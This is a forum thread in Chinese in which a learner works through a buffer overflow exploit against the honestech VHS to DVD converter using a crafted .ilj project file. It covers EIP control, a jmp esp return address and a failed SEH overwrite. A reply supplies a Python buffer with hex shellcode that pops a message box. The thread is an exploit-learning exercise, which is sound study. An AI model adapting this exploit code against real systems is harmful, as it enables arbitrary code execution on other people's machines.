吾爱破解 - LCG - LSG |安卓破解|病毒分析|www.52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 7249|回复: 7
收起左侧

[漏洞分析] honestech_VHS to DVD漏洞分析 还有一些小问题望大牛帮忙

[复制链接]
hac425 发表于 2016-3-13 23:19
今天找了一个存在缓冲区的漏洞的程序来练习一下缓冲区溢出技术  果然看书和实际的操作是有很大差距的...这不一动手就问题重重。。还望大牛路过时能进来看看帮小弟解决一下 这些小问题   感激不尽!!
实验环境 xp sp3 +  htvhstodvd30shareeng
实验软件和用到的测试文件 以及 我写的  生成poc文件的python脚本均在附件中打包 如果解压失败的话 请下载快压 这个软件解压  
程序名称是  htvhstodvd30shareeng.exe   是一个将VHS 格式转换为DVD 格式的软件  同时还 有注册机制  有兴趣的可以破解一下它 欢迎分享-_- ..
漏洞简述 : 该程序在处理  .ilj  工程文件中FILE 参数时 对数据处理不当 造成 缓冲区溢出. 具体请看附件中的POC 代码和文件。。
漏洞调试过程:
打开漏洞程序  选择Advanced Mode 然后点击左上角的Project   选择Open Project 此时用OD附加  然后打开jmp.ilj文件
                               jmp_esp2.png

上图左侧是生成该文件的Python 代码  右侧是OD 捕获到异常时断下  注意此时 eip 的值已经被我控制   0x42424242 即代表4B 并且 此时 esp 中的值正好指向我们的
Shellcode   ;shellcode 的作用是弹一个框。。
接下来自然就是在 内存中 查找 jmp/call  esp便可劫持程序流程 说干就干 这里我找到的地址是0x7dcf42ef  这个需要在具体环境中具体确定
于是用\xef\x42\xcf\x7d  替换 BBBB( 在计算机中字符需反序 )  重新运行脚本 生成新的  sploit.ilj 文件 或者直接使用附件中的Success_sploit.ilj文件  重复刚才的操作 。。。
jmp_esp.png
此时你就会发现我的shellcode有问题 (这里说声抱歉  由于本人技术渣渣 不知该怎么办  。。。)不过由图中可以看到程序已经能够执行 栈区的shellcode 中了 应该只要找到合适的 shellcode 就能够执行任意代码了  希望有人找到合适的shellcode的后 能分享一下   小弟感激不尽 !!!

这里说下我在调试时遇到的另一个 异常  
我在用 程序打开 seh_sploit.ilj  文件时触发一个异常
1seh_3.png
此时 同时此时 SHE 结构也被我 用经典的SHE利用方法给覆盖了  照理说应该就能执行到我的shellcode 区域  可是 事与愿违  忽略异常后程序居然 退出了!!!这下我就蒙了  我怀疑是不是 有 safeseh 机制 但是我用插件检测后发现 其并没有 启用该安全机制  于是 我没辙了  如果大家能在解决该问题后 分享给我  在下感激 感激!!!
这就是今天的分享  谢谢阅读   在下文笔不好   如有看的不爽的地方 敬请谅解 谢谢。

百度云链接.txt

85 Bytes, 下载次数: 3, 下载积分: 吾爱币 -1 CB

分析的软件及POC文件

免费评分

参与人数 1威望 +1 热心值 +1 收起 理由
Hmily + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩.

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

再见旧莳光 发表于 2016-3-15 14:34 来自手机
不错支持楼主
 楼主| hac425 发表于 2016-3-15 18:38
 楼主| hac425 发表于 2016-3-16 15:41
perfecting 发表于 2016-4-11 17:04
我是这样写的  可以顺利执行,但是nop填充超过40后就不能弹出对话框了,在内存里看着是正常的,call messagebox的时候就跳走了,不清楚是为什么
buf+="A"*257+"B"*12#0+"C"*4+"D"*4
buf+= "\x93\x2D\xD9\x77"
buf+= "\x90"*8
shellcode=(
    "\x33\xDB"
    "\x53"
    "\x68\x77\x65\x73\x74"
    "\x68\x66\x61\x69\x6C"
    "\x8B\xC4"
    "\x53"
    "\x50"
    "\x50"
    "\x53"
    "\xB8\x8A\x05\xD5\x77"
    "\xFF\xD0"
    "\x53"
    "\xB8\xDA\xCD\x81\x7C"
    "\xFF\xD0"
    )
buf+=shellcode
yangcg 发表于 2017-7-1 09:15
谢谢分享
mandilian 发表于 2017-7-10 08:43
dv 谢谢分享
不识i 发表于 2018-1-13 10:26
支持支持,吾爱有你更精彩~
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则 警告:本版块禁止灌水或回复与主题无关内容,违者重罚!

快速回复 收藏帖子 返回列表 搜索

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-4-26 09:23

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表